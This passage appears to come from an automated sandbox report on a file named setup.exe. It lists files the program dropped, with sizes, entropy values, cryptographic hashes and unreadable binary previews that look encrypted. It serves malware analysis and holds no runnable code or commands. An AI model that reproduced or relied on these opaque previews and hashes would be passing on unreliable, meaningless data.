`).9..t|..|j.FvZ...y.2...S....l....>/]9.....fJ.[G.8.5./%K.6....~..d.[.{.W..:.OO.hNU....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1693
              Entropy (8bit):7.861598374584744
              Encrypted:false
              SSDEEP:24:DTQmlCT8gYBEBTyRkYRHMcka6hnhNp+pCGTai0ygq9do+7mHGIHAVN/+tk/UdSLF:PQmlsAkiihXoCe5doMmf+g2l4wJD
              MD5:401ACAF33E263D47C333C1CDD40F1AD3
              SHA1:AD511B7B63B882291AF1F1AB70F5843D67DF9AC6
              SHA-256:7116CE1F162BB943667C50D651F53ECE9FCE0F1F5A3AEE922E0C167C8796DA65
              SHA-512:DD650FBF2EF88676A12B0EA14A9953D5EFF83A054B839F53F2142B937A0A4BBE60CBF46421CF3BF987DA1D4AFB64BD0C0429A56A97A01C6A41107E7639D96E86
              Malicious:false
              Preview:<?xml..'X.a'j..9Q...[..;.........p...Ya.$.,v.d.xh....}.Ia%...i.h...[..DI...F.9T.V:c.v.....T.b......O.$W.g...E.x1...2.&:.....m.&;..DR.......&..x.............R.....8..8.G..ra.^.D.-..7m......E(..w.n....|@..T".p.$.=.0...t...O'.e.`..-.7...jt.z..rA......2r5....2k.M...F..>...$F~]..a....D....a=.i}........i..-.c.:.....c'.V;."......DQ..k...O.....0d./.u..+..M............;....-H.<.S.u,Ag.r......:.B..a.e...A.GR.n.2.Q.R[.h.:<.0E.8-...X.h......L..[j...h..5u.2....l ...}.R_.....N...B:.7.a....>e'0._......."..*q..r.a9W.....c6p.....*.e..y062.C.k.dG....J.W.........QCR...b.pAXU3..5<... ../..C..F....s.?YiMj.....O.y.A.sQd....Y.v..<.VL<~.....Rf.....!...RfI......<.n....9>.../;.Od.0......hF.,&....'...`k..{......r..G.....wrl....r...D.....<..o...E.b..*<.].................i......Ov..q.?...Gg .A...6....TQ......w.n...d.V...$..l1.k............I.W*..8.........S.....V...\......AF.....Vkp....n.P...i,.|.)A....'..8..&...D.O.}.s...k.7l..c.V...K.K...f.N.../.vHC."...;*
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1730
              Entropy (8bit):7.880518183564549
              Encrypted:false
              SSDEEP:48:+TI67azTgfPNbIu01VMnQNKf7Ypa45krhVcCD:+evgnNbIx1VMj7Sq9/
              MD5:8A40D38660F086209CE000D1B3A37A99
              SHA1:8AF433E5D57D9697A5BDD1C2843712608B340386
              SHA-256:BEF3AEFF0EFB0E2E1AB5081062DCD49539D2C55218C2DA4054C1B84EC16DD6A3
              SHA-512:3FE148F83B2E994630B0E0D5898C2BF4682630DD7A9F6B5840E5B82CA03472AAA580BBC28281219B299BF1024B89A29B6405CC992C942AA4AC7C7C6175AFF763
              Malicious:false
              Preview:<?xml"?..B........B../.vv...U.B/:r...c..d...k;.....8.#C .....o-..2..j.s.\....j.=BO....s..f...}..s.=.G..^r....%e..w..zr.Gs..i.._RL6...S..&.c..:..,.n':.x.m).....;~..Y....)c5.N....c\_.H.d...{K.O...:s.\.q^. .#Z...Cm.....A+.. .....6..U...1^;..*.Y/.H....yq0TY..X.=..Y.Y.(....y....u..]....U.....`(.l..P..>`+sg..f.(...Bp....]......`!D"../]..8... .p..I...0..a....+[7.....O.9!.s=f\...B{.h...+.YH....<..Nm..4...N.9nW..'L...&Y.c.Ss...o=....v..o.............e...t.EQ+...b....x.0.n..6.EEv. =W. $.6...0/........gLf....q5...F.%h!...H.Pw.W..].$%..\G..E?3...U.7_..;..?vrS...B.JAo\o...P.U.Q2.!.j....I%.b......(..,.v......Q..F.n...T.~.H.3(.'..M&8.2....bo.=....sz..G%3.Nvv.@.6>.n.Y......H`H%Y.-x[.p....h......6.x...H=-|...[7r6;.....#....{...*K..%g_..&..L...O.}...@...*.\GKT._....|,...5.......nq..}...'....S.8.e...UiD....O)=....g.M.#..t".k.=Qx.wUMC.D.)X~.T..z.O.jQ.s.j3......;.G......D.......b.M...O.]8.*bt.;.!..1./._.u...#......E.xz..i...i....H+n\a.d..@G...#.]....._.i4^..,.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1685
              Entropy (8bit):7.867244599644026
              Encrypted:false
              SSDEEP:48:u630DIRwOm+httHH9jjPu+5kWu/xqLr0D:MKhfHHVfLu/j
              MD5:E4C18F0122C8A2E5284D83AEC8BADD84
              SHA1:12F7FFE18A4BDAEB317AB034E5D87611F285EFDB
              SHA-256:4477C6A62F348D7357E2DCBA17B7BE30011CC8820931C6574FBE3B026BE5DD99
              SHA-512:471A2AB031CE32FB7E6D593E694EB6C41DA5EC8D6D43C89DFB473DC56547897A6BA334423D2AA3282C062DC42207AD56C594673AE806A37BE6C4A79044DFE1BA
              Malicious:false
              Preview:<?xml.....$......`...7xw.k5/2....x{.g.!..B..j.&1..)0.vH765......P.-........}...r..]>._......G......A....;;V70.:.Bst.'....Y#.b.......C"v..b-@.....C>....<...j......x.._.U....B..r~s......HO...e.ol.>.kMc..t.+.2Z[>.`..rs...........(....[1..z$.y..x.N..Nm\Xm.(.y...~r....;....%....%..0..c..YC....`..TO*W_j..;.w.>..Gn..... ..,.)..\.8..k.........b1.......-.9`.oT6>,L@D..........g.......bs...T>.F..Y-...r..E..s.uK,k...*.;...+.1..O.......I....i..Wq.z.w..<.w......3 ..<....).....?.#......e.m.\i......a...\/...[.0.o.da....E.j..D...3.g..+9{kK.r'....<..V.N...!Z.......[u...K..hT)".1BH......\./.<2st..1....3.i.......h.X.O|..h9.9.[....h.JO.G.tC.......B|.n.Bo0.....*..p...af...*.[..i...P.\{.)....=3..b....~.+...Uw.J.Bf...]...W.+LKbS...@.............. .%.2'l..kQ..2...../.R.1M.....B.@....(.sGNC..4.D9l.c0...._..u..U....D. Af@.V....v..Y...y.F.IX`.d4.....0..3..e/p.w..X/..w.9f2..R...m.J.]a..k`.G.Z..%H5...%Z......o..1.).U......q..8`H..b.I..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1722
              Entropy (8bit):7.902951079804261
              Encrypted:false
              SSDEEP:48:/lvyQ9at0ocQ55qi0A2pSWXcny8BtdGKD:5yQ9aS5Q55SHpPXcy8QC
              MD5:061EDAC159D2329F46B2A22C7A71B107
              SHA1:110BEEE25BCE9EA21D3C60330ADA86CA0490AB81
              SHA-256:89E6F0F25D1FD41A1EEDB627A083A5CA7EF3CCCD6D38501FF3FFA6F1A9EAD4E0
              SHA-512:C686EC963D3EC754DD7C0AD132022522C688C85143F9F5498C585D648700E94FFFAC4E823F3D98410F95782836AEAC0CA750DAC06EBB7E85BC091CB5E4445356
              Malicious:false
              Preview:<?xml.=_.Mq..~OBqI.3...Dq. %.p.N....i#{..N...KPC...0.B..P....A.@.g&...'.M....g<..o.........`."s..o...MOn.~......_D..MI7.cg.."..6.@BB.v..d...&..p_....3...D.....(.....4....e..|....+..Y.\NX.Z:`.....se.q].C.L8.{.1..W.%l.S{.|..T..>|6HL.O.`.....M.....o...3..d..Kcc...q.9....mk'j.k..1.Z.xV.........>..!.~L....3...[..Y...%.29....67.....d.v.I.}.....V@f...2...`.Y.t.=-.a/G.!...Em.QyxP.x....a.9..C....e6....`JZ...|..]..l.:..r7....iuR.*DFz..q .8[>k,....w.....8E.......pb;0.p.y7f.GE..x.+...b..2...X0#.[.5.....?.P..}w.Q.R..6..E...ErQ^EEc..K..".y..j...D..N.G...(eY)....R7...4.......0...0d|..h..#..J.....r..T..o._......@l2q.=.~....;....i...VF..C.T...Al.Hv..>. ..>$4\I....`0....@.].m........4.d...O.L..D..&..+..ls......~NSbj9JCS.pV..1IwS..KC4R...W.:...o...W....d..b....."D.D}....<..M.}..eU...|.Pz..|-. 5.W.u..EdY....M$......E......LM^F2.w...y...E..q.ie...~..R....T.......\.e..c.!z(.$...d*...8.`.!...a.F"..&.Z_O.{O.l.2_...O3L.j@.u{i...!.p7.#...|...R.....O.......<N....aq
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1695
              Entropy (8bit):7.886868770707154
              Encrypted:false
              SSDEEP:48:kPjMfLRhWssfNhOwhlNHVrrLPPK1u1r/BjMD:kPjMVhxsfNhOwhHHxmu1r/Bs
              MD5:F3AD31F5285BE82D2C946CB5D3C9522D
              SHA1:62A3B697BFB2A4E9B161F4ADF9B61A96AE2C3350
              SHA-256:0A59B8B33B3BDD8BEFC9C3496C20BB097FFF25E431FEBF550CE60910E83CC436
              SHA-512:7E44AEC018370C0492E56D762A9B0FA9D3D29B6A25987E2242B8C031B51147D5D4C4E9469C7EE60F0453320941A76ECBFA64F3A8F0CC86177144B02BED2A2AED
              Malicious:false
              Preview:<?xml.E...m;..PO..@..lxO..3p.....@...]`.a..C-..3.M{$..V.....d.>..q..F..$.Ti.........H..67.....=.Pp ...z.C.?].Q.....3.G...2...Nz.}..@.Z.n0...YJL.m.0...!.....h.D..l.0a......S9.Yhv.......8_.f..0.{......C}..'..*.....A..f%r..M....././KTr..c)..E.G./.3.....h....(oU.c.......!...zK.I..d_.&Q.f....-R.N.-...p.5.&~#4..M5....w...G.!.j.:t.+..r.j..4.GJ ...p...P....lO..$..n +.\.F....j.....fy..G..{...O..y$....2..4......pt6GX(.{...4.....T.F..X9'...g.J.].ER....oQtf:.!..g..2.v.....=Td5..7b.S.)......_.v.W.F.......#.C....S=M!...2..l..s.. ...-,..2...%B...(.bR.A@.........y..T.B...wQ.I..9....=X.0t.g..\H]9..D.1.~0..7...%.R.....GYa.D%lr.*.....6.......D".v.k9m.pN..^...... '=.......DsI.....mf....QBR....\..#...i.......Xs8.h.8n....d...V....x.,..}S.....i^...k..>Z.Q?.s;.C......&.A5K.....o.4 .d.!.j..6B..K<.}'y,...~%....*.>&T.*.].k$&.L...8.y.../.....x6#..'..G..i...H.>.0..{|..%...d7.......6..l{...<.#..y...@...5. ..y.|.$!bA-..v.ut.H..QLY.].*.!>...~~..>.|.PO..Iu..{.r{.'>>..X.+|.<I.AV..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1732
              Entropy (8bit):7.890640903668198
              Encrypted:false
              SSDEEP:48:e4AlaB7njtgMcBOeESTUii7GhDZUk3sUhpWa+vd3TtK7D:eblalnKbmSTUiVBZUffd3TtK3
              MD5:C896AAEE8E23161AC1CA9A3D9CE70000
              SHA1:754BD4F5720EDE22CCE1AC1DA5E9EBCF7C031B67
              SHA-256:787D956B16B53FD90758F1276224D68F07F60496510A14054990DA0BFBAE3463
              SHA-512:A660FDEC7AE2532D3D85F3DCC3F50B8F1DEB849C4BAAE61BE58427C6933BE6879AD31CB5DE862ACA1CCCD64754588316A1FFEEA5B56C0504194511E5D51F0635
              Malicious:false
              Preview:<?xml.k'.l.}.Z.h."'.x.:l..@.U..3.zq(...C.......U.t.8.....(.[.`.......A.K..%.=..}.rA...m..N...-......l..\.Ru..]....<j..Y.p.X....I.b.6.hg.r.y.).l_.:..y....@....Z;..O!>...o.y.Km7.._.F.W....l...."w....B~....S.*....P...(..x..I.e.....O7cP.JJ:.......Rm.wU..d...1.EX..3.b.,......Q....Jq.Y4M.T.u(]_...m.*.......%.=,.*.(..1@.G.|.C.....K-<........`?..$..,.T..]i.G<;|..U_.w..:.t.D.......+V.@(7.W@U1.g$....2Bdw.C#....6....x"[....k(....Z.D.(E.j...g....xf.C.......l..'j+Ty^.....I...6g.[z.1......7...N..$...g..@........P{.......H..@..'.C.!...].!)*``oB}X.....r.H..Z....2S....8.{..(BK.[gSE.V..7~..L..as..e.l......Y;5........?..!.B8:mc...Y..0.&z. .\j..o`.?#.9g.c0.....d..JN!j...W...^<x..)...X5..d>...y.t....u..o...*H.G.u...9.....-...........).......(C...E.......@T...-._<q.|..2j.p<>j).21...I#....2.......f.Vq(SDL.l.&..eY..H....d/....O..jN..|...?.H.>1.A.i,w..%5..._..5...a.J....j@.,3.3...!.f.H^8'_...d./..n...-GH..^.5.h..v..N..y...^E..%1.YGx..Mg.Qu+j......-I..u....n.;
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1691
              Entropy (8bit):7.876514821298547
              Encrypted:false
              SSDEEP:24:LvDW8unYQR/eAFYWyBJ+hdSpwwGOAx0i/kYQnX6vbhfcJlF7a7Bznjr0kdMstzir:LvDW8unY620YRmyAmi/k16VcFuGaFcjD
              MD5:F3DA1A25606F815A9EFD904928AEF516
              SHA1:59BDC5EB89F1873011D3E67A1CE81F57C05E533F
              SHA-256:631CCA9BF56A7114F15A96A844F8D84A62CD0581B52EF1284CE65231CEB83007
              SHA-512:A6C8B05308412D74713815D5BDEB2F9077E2E9310C3C28ACBF18FEBAE4297B69B8B7894B3AB16F40D5C81A8D94008BE5B6D8234615E7928E2D1882A2EB063FBE
              Malicious:false
              Preview:<?xml,.w.M.....l.x....v....yv..@...b."....k...=...L..s1#.V..l..4........a.W..BJ.-Gp=...Yz.>.Cy...O.......7...B&......d....L...J.....G.O>^.....I...!.q......(....e.p..'..T...S....8[.......%M..#....wP-l..:..=...?w..{]...s...\...B..,E..l ....RL22LLcw.I.A....>jP.......X...@...*..9...N4..T8S_q.g..f.GJ....Dz...?.3..)Txt...V...3...,+..W..k...#Y].z..<R{...D.EF.?y.....j..~R[..E8.V....Dim. ].j.......|Dq....-../..............f.>..).bOw.)7....`......6.,>.t.H..Cl....c.....RT...d...;.Q.Q.h.Dz-..^.*T.3I@m.D...HG.p.@.....L.+.....i.:J..j...s.W...8.+a...$.O/3}7.Z...m..t.l^#...t[.8.g.....U3...s....Y.....h.E)5?.[B...&;.;....&K"i...$..Rk.Q.#....D.]..>..f.y..!.e.e.b..N..}V...cx..U... ......U.^e.#.E.v...sRk..B.]....[gh.2..V?..y.=.G.AA.......,...F...d....qF..,FG.f...cM.Z.j....k.e.Kp......=.M.Y..a..b:.....yH.Y}..%.Qp.,T.Op+.y..vB.S.f......iP.....\...YV.E....lm6_@..t.L...Zm\y.X...Id.J.0qya.....t.F:.[\7\m......^.....4_...v.p..o...f.....}.;.=.B...}0..w..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1728
              Entropy (8bit):7.888318221669303
              Encrypted:false
              SSDEEP:24:TJK4qx9CnLjv/I45NYWjDzcNn+vC4xlnO/KfUJJB+1xaWS3R5Zl8l/GYbD:1OC/I45NYyDnC4xlhf8B+Wp3nZl8pGCD
              MD5:D0FE9BADB491F54C53E43F7CA369828F
              SHA1:0CBF2799CB4D3B96680286EDFDADFF2A4A791EA9
              SHA-256:A3DC15C9CB8EE42CA888D833C6B5696BB7EB0AD49DAECE1A4601CDBCB90FBD4E
              SHA-512:F3FF0C8F36B0EC58FE89392E880942D9F440AAD87BE01C8BE1881A40FEEA07F71BB6423CA1F394B5FE997506C74129EEB9B4E81E154F05ECB663C349B5905812
              Malicious:false
              Preview:<?xml...i....\QJ.f....w}.991....6:...W.WK&....<H@......P.l.|4..H1.$..vcqK%$..G*+.....^.7$...*.kM.aH....F."....X.`.)R.L@..5..SS8..9....I.a........w7*d(.C...>.S....d.o0...S..w.b..U./\.Z.4/..t.ZK...".V_.[`1..W.8u*.4.....P>.'3.4ztx..Y.".U..r......Ze....Y..c...pk....:.3...^...k.........*L..jc..zTW.|...<...{....M..=.M..+....y..,...5..!.!&..q..t..S.^wCEt...;...H\.M...$..j.}...]...n.5M.......|Jq.-..D).D*.h~.....3/...A...z..Q.'.1..T.g...]q..}.O.E2.....`..A.n...Z..P*.`..4..4jc.1.^...Y....-....$.F...y^......NV.k"...avGi......=.,.`'.Y."..mT........|x.=...2.....e6...JV.H.N.~.Oh).Q...B.\.*.|.[..us.W./..1.<._<.u....Y.....+...s.h.f.V...?.ts^...H...L<^<...j.5.......+].hd....H;........@5\.......Xq[.OW...50Q..u.v.M.Y.....F8....0.Pd..a.j....Ks;.\U!b._X..^E...N$..........4p..U.bfq......v....r..i.....y..X.v.t....vET]..t.../..X`..o.];..w..!.....X...d...p.r.....4......x?.N.K.?.z+.....,.9.B.:.eU]o.,[.,...q....S.\dg+.....<~.....Y..L.K.r.....ec.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1701
              Entropy (8bit):7.890712925062967
              Encrypted:false
              SSDEEP:48:mUo8hfL5pcUEIdOJEAuI5wrJWGvmbR4RguND:mCjfcUEIdOJEAuNVWGvmmn1
              MD5:6CDF906483037EFCCF6434D8D2FFC663
              SHA1:4F0188D5080C7C35016F1752FC923B9E7C12AA9B
              SHA-256:2090F7034C9B4554D1031A38BC248F8F440CB8A2AA3328CDC1EA8B798ED15242
              SHA-512:2E16A9FA6B2A30B0DFEFB3069ADF3F9A71DF7DC50A8DEE302656A36C4E59CA70AEBCA393758EEE27006DFC94F803DB29596ADB9BE81C511EE7A6CF489D126DB5
              Malicious:false
              Preview:<?xml.D......}.V].0).a....B.......Z%........'F.e.z.n.5...7XX. ..M..s.f#...[..'.a..<v....u#...1C....YT8..a8....*.aW[.r..2...y.uC,.....Wa..J...M..v.mhI...Ns.!..&p"W..%.9.....|t.Us..jw@..@.rq...G..3.Q..$....Kz88..T.8.[.3u>S.ec..z.B..@.X..D..qLk.....`+&(.y....Pgz.Ys._ .0..X.@2.$K.....ky.W....%...g.9..t..?...F.b.A.p..\.".....H.o,\..[...c.....q.hd........?_.n...XM....W..v.C.;.....\.)+!...@.g...,$...>.a..$B...*.P.Ru...-.kb.QC....A.".bq..6kQ......_.n............Z6.R.?.....,\.;B...YAj.|...x..Or........=.~..O._;.w........7.k[*.x.:...2.....`....`T,r3..q#.O.......*`.t.... ...^c..f.......eY..oK..C......Y...@.Oa..O............m>2..T...sD..\.98.._..0.}....H...9...N.......Qeb.3. .SF..W:$.......<V.....;...3...g.i..qP. .(..C.L..s...ip.m..7.Q^X.w.t!2..U.oQ......W..eTb5'+..:.g..S..s ...,.G.Z..T..%.6C..t..&0..o}m......M..G..Wd4H8..&...a2....X..V..."....X.F .... .....?..2.....G..G!..!..Im...+pps....Z...........Gb..r.&"A.g..).t.?pl`..[..Z?.;....yR...3U...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1738
              Entropy (8bit):7.9009492757790625
              Encrypted:false
              SSDEEP:24:2fhirpMsVa4zkWDgelKE/AGZkNu/83jlsL+7Lz150J1chMHaa1ipjmyCaR4DgbD:20DxPM3EoHok3jmLYLz1w1tHaofS6D6D
              MD5:24716A14467BBA9F86E144A012EDFCE3
              SHA1:B703FA2969217A3C20E37E825E3B024F84333BB4
              SHA-256:8913897265AC1D5503F5A4B10331898F32E09EC1DB54073F702B5AD85BFF543D
              SHA-512:28F4F05CE20112478470E9AA3DF20A2838BAA005A313FABB0F4AA400155743BE37DE77B4E805B5F817C8594AFDF33098A62D9EB0E0E2979B6590DFF62171CF6A
              Malicious:false
              Preview:<?xmlp..h.n<..6....D7.v..{.j=K.w!H.!.........xv..r..SoX....-/U2...h.W..U.J..]De.a..ov.y,x........D..&....c'.R@.5FX}....B&./.z....E.....G."K..E K.H.L.dW..h8.....$...y7...h....0l.".'...7'3..F.\.je{v.+.%@...x.......6.p.s4...>.6.......$..o...[...=.h...w.1....w.?<=.2...F)p....s....{.Z.\../..QD.&...<4s...FW}..h....r.k%L.(.D<.............#..|..{.f........s..=i...(.C~A.d..~...<.]kv......>.{y...{...U4....s..49..Y.(....J.).XE.i[6.b.1.u..-nI../5%.....`.....7..=.";.mb.g....Q..Vo.@.Jz.!*..1...a.@........a....';/...0.....A.4M.q./.N ..x[~{....1|Kl;^...!/MI,..c....r,..E7.X.w.i...H.8.).S..B..Q...@zT=0.+6......n...]..p..5..?..D..N.%x*..j...0.~..=..w}M.?,..*..Tb."...Su.\....\.8..C.Sv^X.G;8...b~..+...:......ADT..........8........F.0..yb..J`......18...q+.9k.yE.X...<$.......9_.[..`.........|@.....5..K.....o.}AC........y......N.....e...~..^...'^..\.2...T..Q/F..WHK[.. .A.....R..F8'..F....Mp..yzP..}.9..3..:\g..o..+h..?.|.O..Q.."a..C....?@Cx.g$D,.N.@...-J.^/X9.f.`.Sw..b
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1693
              Entropy (8bit):7.879839070107034
              Encrypted:false
              SSDEEP:24:F8AJwkbKyK8m/7pNnnpi5Q42FqOvP2LDIco2BN0mHch6LYHC3zKAR7fWeVNpjTbD:SALrenpi54GL62o6ch60k7Td5D
              MD5:0D82DB274EEB8555DDE6007D20108AF4
              SHA1:85E60695C66B942F8C8AD6142FBA25306CDE086C
              SHA-256:89558405BCF4891548AFC4FFA5138B1AC29E2E47FFB998D3D57149B3F3D09602
              SHA-512:AA6BEF2EE14526916CF686C01D936017368DF8F4A853D70B418CC6A39A008D1E94DA2AF9E0911405E697B8991801967ABF64171711AF7E8D3A08146213D9A8FD
              Malicious:false
              Preview:<?xml..d.>Hq.......:.N.N".q...1!..._.y.rA...X...+O..k20.....^.h...az...Uj.&^F.....*m.*..@...!...R.z..b...D.r'/.~.I!..;d.].>.....4.r..r...%.`....F.c5..=..O.....,.=.....U@.18#F......{Qy.."7.Fg..V.D..vx..r$jd....f.p...#.&...>.`.5TS...}...%...P...=9!.*...0.|.\+.........M...=L..N.D..I..&,..A...G.9"..*O.=[k.........F`.}..cM=..V......u...~... z.ei..>.cH..cB.\..9.w.d[-\...i.q.Wr.y.*Vb.`.8.X..Z.%O.s..9..t.#...]4.E..\.[.@.)3/...M...c....sM......@SX#XO.v....".t.=..J...M../...(.9...)2}.....!nX...i.K...6..D.../.G|)`..f...z|79N...*.....%.....U.6..)..G.|...A..P.5f.Zo%.$..D.....zOr..C.86S...+_.;..Z/...N..y@~.p...g?.G.GX..............X...z..g..@Q`...$...@..1.YB....am....C.}.....IA...y..+.2.....~.O..]....N=.k...4s....,......1.s............u.7...u.P..m}b.......:6..r.W...|.u]..[3.5.{..U.~.B$.i.t.zb...s?.......Z.^.c.'..r..D.Kpn..H:..H.....8zG.7svFT.......qU..?...~.3..R...]....Z&..Q.<.W.S<V.U4..Yi..5..........bA..4.......F.E..z.. y.=5.+Qs...0...]Z..E.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1730
              Entropy (8bit):7.884070869099113
              Encrypted:false
              SSDEEP:24:AsR8VehztdvFtydKXaLQYXRrKyvaJ/I2KUXUys4Vjaz8uDj3S5VLYmbD:TpbttoKXuDXiVI2ub8uHQLY0D
              MD5:A0B4299493EB147CAAFB0B61CBCBC2A0
              SHA1:7387AF020AC265356A96C693DDE5735FAB969251
              SHA-256:D0E34D2502D861A5A78F198E0128AE0A57CC9EE1DA2FD63136FFA019963DB748
              SHA-512:0F8C86A34984F37F136A4BAAAED921B4605CF54CE551928D27F3FFE0D490A767F4BD3A5E98E76E757E727785AE702994CB060543F4E9087BE4615894D27713A3
              Malicious:false
              Preview:<?xml.......n..t....z.nXu........3..Z7jQ.q.......&".sJ..KDN..8. f..Zjg..r.AL.#......M.|o...gbPJ....i...n.z......(.7........e`..6vj0h.;..._W.Y)...%......X..[n..R.[..m.p...Z..;......!.P.j.[.o.E.....) .........s....T.a!..../<+..]xf{{o.*..j.].m.m..>\.......U....C3f.%.z'*<.........."3.m..[.t*../..;Y4..x0I.....^.?3Z.....V..SM.,...5...F....s.;.u..".L..L`....._..?..Py.)h.J-.T4....8..DP...B..![>Y.w...S.']E..yo...)..B..S.1z.*..^....c....0..j[ZC.4.%.I.........d../..Y....5.o..a...p......B..5jO..8.c7...E..y.7.t.Y\N.u....d...SBibPn.....g'`..(O..lD...<.;+....2.....6......\YU..E.[.f.hB..s.r.....h'!.......Q..w..6.<.....{.c.*v......@.J+G.v....P{..b...I...V....s5..G...7..P.b...2P...2.n7..{!.....~.~...f.:....1...j..f....OAPq.wQI.EF.@.^..../...kY!y".a....0{.T....'....)q.....k.}...z...M..{...=<.(.l...0.W.j0.43.....x66J.W..s..9......d....M...;.$n=.'d.|..N..u..>".....Hz.`....(+.f? p..!.jc...[J...S..Z.;...#mf.....r.p.\.....}F..I....R>.M..."...u.....}+
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):361051
              Entropy (8bit):6.515948371635592
              Encrypted:false
              SSDEEP:3072:HhQorpIYMJJT4e1X2YUnyL0dlMwNj/kE0olP+RXxOydoO1ggktH6AfW:BQwpIYUJT4e1XMyLEMoDklQ+COgtHhe
              MD5:820070E94A9FA3FA9B00517BA467F1C7
              SHA1:03B046969D220E12C0E3DF2F2A83F9891BB5C0F4
              SHA-256:DF8A1D985E1CD244CF6E6EE58D208131A9AA7404C37EA201741AE2F77868C1CC
              SHA-512:31B22D455A61F373C1F6EF4A5203E4E02C375C11F49F720FFA44450A65B201CB0E3378F6B0A7AB83683366E05626896310C8F4C0B9E737822143B779E3412D51
              Malicious:false
              Preview:<Rule....."~D.......iJ(...02r.W..dJ...O.....2.UWF..:.>.$.6..~.A.....s.<..Z.`..R...u.....i...jT.p.G.;<|.....%XI..1...L.x...i\....~.....v..H..=.7:.l/e<.......r..~.i.........}.....8...Y..I...!E...4..SG..@.a....H...z..W.u._K.l:..d'e..z..!..;.y..{.......5...{.H.......*.X"..s....h.J!...O0..S.Z.[.gr;W~1......=..].....Q...@..|Z.(q...V8.....]Z.*.....]1..s..*.L...........M.H!m..e.Wb.../.#>..Cx.>.y...a.e]......".j....w..Wm. ...........O.h.oN.".\..c...d..Ik.x..........n..9.v..|...m..P.nu..$.d.S..`...3. .m|...."m/.2u.T.......t.v....g"..v5@5|3....Sgm.).oL1.g....^.>..l..5.z.Lxi@.ag..,. Q*.G5..._.&?3.1.w.M...g=....>..x.x...)#..(.....9...(....W....@g...x.?.(...P.Oey.(.....2..\.(...@.v;.....Y...\.....+.....5|).=..1/cC.....9G<Qy......U...YeWM........GqW6.L..)...QP....{.N..;.....!e.X.`.......x;.(J^.~...n..........'..^........f0..*.G..z-....Z..........?...|..\A.l....|s....._A.h_;..k.....L..]5..Y.z...g....r.....w0VYE..l7?...\...f.@,..;..'b.ta...x.......'.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1689
              Entropy (8bit):7.895883792422518
              Encrypted:false
              SSDEEP:24:uaUPdrfMz1W5ffOnkzjYkhQ3moTaxvAFZPYVs22Hxi7tn7hmtpNqhanqEgYXse/T:uXdbMRJkgQxzQgVKMRhueha/Jse//VZD
              MD5:A8A890131A4BB9D31BF2A0655A70CF6F
              SHA1:E12F4230DEDBB525AB07A68AD90EF67E8B07DB01
              SHA-256:23173B30EF5460C296B42330A57C888ECAB3A1E83E72A9EE368F4CBF71B00DFE
              SHA-512:EDCD0A8D5858B291312C3F992D8C28845DF3339C2AA1338B825A283809D7391C161970D310462DE7DE3FD9CAD9A8D0572A9E90B5E099298DA0D6993D6169E991
              Malicious:false
              Preview:<?xml.{.'.6.. .)J.......Q{<."..~....A..W.vdMA...s'....A....(.6}5.;...[.:....#!aZ.\w...b\.a.\BHr.X......c.............9.[Ua.K..p.......N.D.Af..'!..m!..Z(p.v.....@J...nA5.`y..4. ...u..s.35M,...'..#....JWf.f......$BIs....<7.d....".G.....5..../.kGq8l..7.X....l..v.H....,.....y.sD.......t;...J...H.........}":..........=...k..k..`b....$....[..jv.f{3..).n....?....R...H.C..E....S){...L.&..,zy.P....?.e.n+..*i......1E.N."...u..~.y....=......V....-.8...j-........J.p.+.'n...\uR..pc..~....rbP.3...#.{.i.7.=..........e..f..yk.m...`"..^...q.~xf.s... ...A....K.&.<..qM]T|Z.....xh...VV|....p...a....$%Do3.h_.g....;..Y..O...L..zW>.c..)...uw..?rb..l.V/*.F..|.m.,...........ee..]...nL..-.z B......Int.@.......=.2.G.A.....V..f+..._....@..F.S.....N)..i{.{'.b..B.....k .-u....^.;....s....U...5I.X.Y"5....P...n5Z9..o..............2?.....C.N?Q.v..]..U.[.S...V.i....KB...a......7eu. J.f.=..oX.v.).....3..2.e...B.o.....tA._g....6......k<[.....o........t.N.f.O..D.n.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1726
              Entropy (8bit):7.886448717450205
              Encrypted:false
              SSDEEP:48:1Z80K8ji/PIBsqFMRU7LcVpk6CtZD7reEfdzj6nDWtD:1y0a/PI9FMe7Lcgxb/1Cq
              MD5:FB0AA05B9EF381143FF86A9C35C250C2
              SHA1:D1197FF1CC530F9E75B747A72B83EFAA6D87604D
              SHA-256:66048BDFA04B62B3F8799DFA801DDD338CE7D4AC9D8957D636D69B27502EEAD5
              SHA-512:D403007556BF2D82B0B2711AD6B7ECCED0543B58B85B6C2B49432FA77C2AB9B4499253DF9216E47DF2301C9369C4A04780B5577FFAFEB3E0DC0F25ACA125CD97
              Malicious:false
